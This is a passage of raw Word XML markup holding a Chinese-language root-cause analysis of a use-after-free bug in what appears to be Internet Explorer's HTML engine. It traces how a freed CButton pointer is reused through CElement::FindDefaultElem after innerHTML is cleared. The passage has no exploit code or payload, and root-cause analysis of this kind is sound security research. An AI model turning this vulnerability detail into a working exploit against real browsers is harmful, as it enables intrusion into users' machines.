          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象保存在edi</w:t>
      </w:r>
      <w:r w:rsidR="001778A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkEnd w:id="23"/>
    <w:p w:rsidR="00EC3768" w:rsidRDefault="00756AFB" w:rsidP="00CE639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488299A" wp14:editId="77FB85F7">
            <wp:extent cx="6645910" cy="40214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99" w:rsidRPr="008A04D0" w:rsidRDefault="00711C31" w:rsidP="00711C31">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="OLE_LINK22"/>
      <w:bookmarkStart w:id="25" w:name="OLE_LINK23"/>
      <w:r w:rsidRPr="00711C31">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::GetParentForm</w:t>
      </w:r>
      <w:r w:rsidR="002111A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回0</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并最终返回[</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+1A8</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值，这里[</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+1A8</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存的就是已经被释放的C</w:t>
      </w:r>
      <w:r w:rsidR="007929B4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00942517">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>utton</w:t>
      </w:r>
      <w:r w:rsidR="007929B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="004A5199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkEnd w:id="25"/>
    <w:p w:rsidR="004A5199" w:rsidRDefault="00651EDE" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D53B47A" wp14:editId="5ED45E3F">
            <wp:extent cx="6645910" cy="369252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14" w:rsidRDefault="00C41A14" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="OLE_LINK24"/>
      <w:bookmarkStart w:id="27" w:name="OLE_LINK25"/>
      <w:r w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总结一下就是</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00F26589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bo</w:t>
      </w:r>
      <w:r w:rsidR="00F26589">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dy</w:t>
      </w:r>
      <w:r w:rsidR="00F26589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签的</w:t>
      </w:r>
      <w:r w:rsidR="00F26589" w:rsidRPr="00F26589">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r w:rsidR="00A3218A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事件完成时会调用</w:t>
      </w:r>
      <w:r w:rsidR="00204BA5" w:rsidRPr="00204BA5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone</w:t>
      </w:r>
      <w:r w:rsidR="00204BA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E26C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="00B9376C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会调用</w:t>
      </w:r>
      <w:r w:rsidR="00B9376C" w:rsidRPr="00B9376C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00B9376C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找当前</w:t>
      </w:r>
      <w:r w:rsidR="002226F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C06DEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00B9376C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:r w:rsidR="00AA707F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00B9376C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的默认元素</w:t>
      </w:r>
      <w:r w:rsidR="004F2045">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前C</w:t>
      </w:r>
      <w:r w:rsidR="00673ABB" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00BA1772">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidR="0028125D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidR="0028125D" w:rsidRPr="0028125D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::GetParentForm</w:t>
      </w:r>
      <w:r w:rsidR="0028125D" w:rsidRPr="0028125D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回0</w:t>
      </w:r>
      <w:r w:rsidR="0028125D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，从而</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回的是</w:t>
      </w:r>
      <w:r w:rsidR="00295D44">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>记录在</w:t>
      </w:r>
      <w:r w:rsidR="009108C4" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CDo</w:t>
      </w:r>
      <w:r w:rsidR="009108C4" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="009108C4" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="009108C4" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="009108C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量也就是</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已经被释放的C</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>utton对象</w:t>
      </w:r>
      <w:r w:rsidR="000040FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F20C41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>造成了</w:t>
      </w:r>
      <w:r w:rsidR="00E46543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r w:rsidR="004E70A7" w:rsidRPr="007B0A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D873B3" w:rsidRDefault="00D873B3" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D873B3" w:rsidRPr="00B373FF" w:rsidRDefault="007573CE" w:rsidP="00D873B3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="00D873B3" w:rsidRPr="00B373FF">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D873B3">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元素的</w:t>
      </w:r>
      <w:r w:rsidR="00DB4490">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建和</w:t>
      </w:r>
      <w:r w:rsidR="00CE25A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>释放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215303" w:rsidRDefault="00EE2289" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2289">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = "";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后会</w:t>
      </w:r>
      <w:r w:rsidR="001B1CBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C272F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的子</w:t>
      </w:r>
      <w:r w:rsidR="00275936">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元素</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FC6">
        <w:t>CformElement, CdivElement, CButton</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FC6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C272F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从DOM树上卸载下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00275936">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是</w:t>
      </w:r>
      <w:r w:rsidR="004E2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="004E2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>其对应的CTree</w:t>
      </w:r>
      <w:r w:rsidR="004E2DA4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="004E2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidR="00215303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2289" w:rsidRPr="0097052E" w:rsidRDefault="00DC5B49" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097052E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = ""</w:t>
      </w:r>
      <w:r w:rsidRPr="0097052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r w:rsidR="00E11106" w:rsidRPr="0097052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元素创建：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F12E9" w:rsidRDefault="006F12E9" w:rsidP="006F12E9">
      <w:r>
        <w:t>e0: C</w:t>
      </w:r>
      <w:r w:rsidR="00A8016F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>ormElement</w:t>
      </w:r>
      <w:r w:rsidR="00CE5BDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidR="003406DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:p w:rsidR="006C6BA3" w:rsidRDefault="007063F9" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F95EEDE" wp14:editId="27B3182E">
            <wp:extent cx="5666667" cy="19904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A3" w:rsidRDefault="006C6BA3" w:rsidP="006C6BA3">
      <w:bookmarkStart w:id="28" w:name="OLE_LINK26"/>
      <w:bookmarkStart w:id="29" w:name="OLE_LINK27"/>
      <w:r>
        <w:t>e1: CDivElement</w:t>
      </w:r>
      <w:r w:rsidR="004B1F4F" w:rsidRPr="004B1F4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1F4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:p w:rsidR="00F13571" w:rsidRDefault="00597CFB" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AFC338C" wp14:editId="4E016C41">
            <wp:extent cx="5571429" cy="2066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71" w:rsidRDefault="00F13571" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="OLE_LINK28"/>
      <w:bookmarkStart w:id="31" w:name="OLE_LINK32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CButt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00AB555E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:p w:rsidR="0066182F" w:rsidRDefault="0066182F" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0C7EF7" wp14:editId="5D961CE3">
            <wp:extent cx="4971429" cy="202857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71" w:rsidRDefault="00F60571" w:rsidP="00F60571">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="OLE_LINK33"/>
      <w:bookmarkStart w:id="33" w:name="OLE_LINK34"/>
      <w:r w:rsidRPr="00D326CB">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = ""</w:t>
      </w:r>
      <w:r w:rsidRPr="00D326CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后元素的CTree</w:t>
      </w:r>
      <w:r w:rsidRPr="00D326CB">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00D326CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被释放创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF541B" w:rsidRDefault="00CF541B" w:rsidP="00CF541B">
      <w:r>
        <w:t>e0: C</w:t>
      </w:r>
      <w:r w:rsidR="00516493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>ormElement</w:t>
      </w:r>
      <w:r w:rsidR="008612FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTree</w:t>
      </w:r>
      <w:r w:rsidR="008612FB">
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="008612FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF541B" w:rsidRDefault="00CF541B" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkEnd w:id="33"/>
    <w:p w:rsidR="006B1595" w:rsidRDefault="006B1595" w:rsidP="00CE639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ABDE1B0" wp14:editId="2F0E1AC8">
            <wp:extent cx="5619048" cy="1980952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C3" w:rsidRPr="00FE6496" w:rsidRDefault="005C04C3" w:rsidP="00CE6393">
      <w:bookmarkStart w:id="34" w:name="OLE_LINK35"/>
      <w:r>
        <w:t>e1: CDivElement</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE6496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTree</w:t>
      </w:r>
      <w:r w:rsidR="00FE6496">
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="00FE6496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:p w:rsidR="00167B4B" w:rsidRDefault="00167B4B" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="077F9A68" wp14:editId="023D4596">
            <wp:extent cx="5409524" cy="2047619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89" w:rsidRDefault="00A805DA" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="OLE_LINK36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CButt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00D51F9F" w:rsidRPr="00D51F9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51F9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTree</w:t>
      </w:r>
